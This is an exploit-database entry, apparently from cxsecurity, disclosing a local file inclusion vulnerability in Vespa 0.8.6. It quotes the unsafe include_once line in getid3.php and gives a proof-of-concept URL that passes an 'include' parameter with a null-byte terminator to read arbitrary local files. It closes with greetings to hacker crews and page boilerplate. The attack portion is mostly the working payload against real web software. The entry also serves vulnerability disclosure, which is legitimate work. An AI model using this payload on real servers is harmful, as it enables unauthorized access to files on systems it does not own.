Vespa 0.8.6 Local File Inclusion

2012.02.07
Credit: T0x!c
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: [vespa 0.8.6 Local File Inclusion] # Date: [05/02/2012] # Author: [T0x!c] # Software Link: [http://vespa.willinger.cc/] # Version: [vespa 0.8.6] # Tested on: [Windows XP] ::::::::::::::::::::::::: =================Exploit================= -=[ vuln c0de ]=- /vespa/getid3/getid3.php 363 // include module 364 include_once(GETID3_INCLUDEPATH.$determined_format['include']); ----exploit---- POC : http://[ Address ]/[ Path ]/getid3/getid3.php?include=[LFI]%00 ================================greatz================================================ Greatz to : * KedAns-Dz * Caddy-Dz * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * Kalashinkov and ALL Akgerian Hackers EnJoY o_O

References:

http://vespa.willinger.cc/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top